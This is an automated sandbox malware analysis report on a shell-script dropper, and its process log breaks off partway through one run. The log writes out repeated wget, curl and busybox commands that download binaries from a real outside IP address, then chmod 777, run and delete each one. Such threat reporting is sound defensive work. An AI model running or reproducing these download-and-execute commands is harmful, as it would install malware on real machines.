Malware Analysis Report

2025-05-06 03:38

Sample ID 241124-bgrctasldj
Target 26f371cd3359d8f6a45ccc544288c804.bin
SHA256 62a4f45e115628fc0a1a715955751f95da641bea81d8b9e50f08b9a5ae16312c
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

62a4f45e115628fc0a1a715955751f95da641bea81d8b9e50f08b9a5ae16312c

Threat Level: Shows suspicious behavior

The file 26f371cd3359d8f6a45ccc544288c804.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-24 01:07

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-24 01:07

Reported

2024-11-24 01:09

Platform

debian9-mipsel-20240611-en

Max time kernel

92s

Max time network

90s

Command Line

[/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy N/A
N/A /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 N/A
N/A /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat N/A
N/A /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c N/A
N/A /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E N/A
N/A /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y N/A
N/A /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT N/A
N/A /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 N/A
N/A /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB N/A
N/A /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR N/A
N/A /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 N/A
N/A /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey N/A
N/A /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O N/A
N/A /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 N/A
N/A /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E N/A
N/A /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y N/A
N/A /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT N/A
N/A /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 N/A
N/A /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c N/A
N/A /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR N/A
N/A /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 N/A
N/A /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB N/A
N/A /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O N/A
N/A /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 N/A
N/A /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey N/A
N/A /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 N/A
N/A /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat N/A
N/A /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /usr/bin/curl N/A
File opened for modification /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /usr/bin/curl N/A
File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /usr/bin/curl N/A
File opened for modification /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /usr/bin/curl N/A
File opened for modification /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /usr/bin/curl N/A
File opened for modification /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /usr/bin/curl N/A
File opened for modification /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /usr/bin/curl N/A
File opened for modification /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /usr/bin/curl N/A
File opened for modification /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /usr/bin/curl N/A
File opened for modification /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /usr/bin/curl N/A
File opened for modification /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /usr/bin/curl N/A
File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /usr/bin/curl N/A
File opened for modification /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /usr/bin/curl N/A
File opened for modification /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /usr/bin/curl N/A
File opened for modification /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /usr/bin/curl N/A
File opened for modification /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /usr/bin/curl N/A
File opened for modification /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /usr/bin/curl N/A
File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /usr/bin/curl N/A
File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /usr/bin/curl N/A
File opened for modification /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /usr/bin/curl N/A
File opened for modification /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /usr/bin/curl N/A
File opened for modification /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /usr/bin/curl N/A
File opened for modification /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /usr/bin/curl N/A
File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /usr/bin/curl N/A
File opened for modification /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /usr/bin/curl N/A
File opened for modification /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /usr/bin/curl N/A
File opened for modification /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /usr/bin/curl N/A
File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /usr/bin/curl N/A

Processes

/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh

[/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/chmod

[chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy

[./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/rm

[rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/usr/bin/wget

[wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/chmod

[chmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4

[./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/rm

[rm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/usr/bin/wget

[wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/chmod

[chmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat

[./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/rm

[rm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/usr/bin/wget

[wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/chmod

[chmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c

[./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/rm

[rm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/usr/bin/wget

[wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/chmod

[chmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E

[./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/rm

[rm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/usr/bin/wget

[wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/chmod

[chmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y

[./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/rm

[rm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/usr/bin/wget

[wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/chmod

[chmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT

[./Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/rm

[rm Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/usr/bin/wget

[wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/chmod

[chmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0

[./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/rm

[rm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/usr/bin/wget

[wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/chmod

[chmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB

[./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/rm

[rm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/usr/bin/wget

[wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/chmod

[chmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR

[./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/rm

[rm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/usr/bin/wget

[wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/chmod

[chmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5

[./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/rm

[rm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/usr/bin/wget

[wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/chmod

[chmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey

[./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/rm

[rm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/usr/bin/wget

[wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/chmod

[chmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O

[./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/rm

[rm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/usr/bin/wget

[wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/chmod

[chmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5

[./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/rm

[rm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/usr/bin/wget

[wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/chmod

[chmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E

[./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/rm

[rm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/usr/bin/wget

[wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/chmod

[chmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y

[./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/rm

[rm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/usr/bin/wget

[wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/chmod

[chmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT

[./Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/rm

[rm Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/usr/bin/wget

[wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/chmod

[chmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0

[./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/rm

[rm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/usr/bin/wget

[wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/chmod

[chmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c

[./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/rm

[rm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/usr/bin/wget

[wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/chmod

[chmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR

[./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/rm

[rm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/usr/bin/wget

[wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/chmod

[chmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5

[./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/rm

[rm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/usr/bin/wget

[wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/chmod

[chmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB

[./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/rm

[rm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/usr/bin/wget

[wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/chmod

[chmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O

[./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/rm

[rm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/usr/bin/wget

[wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/chmod

[chmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5

[./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/rm

[rm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/usr/bin/wget

[wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/chmod

[chmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey

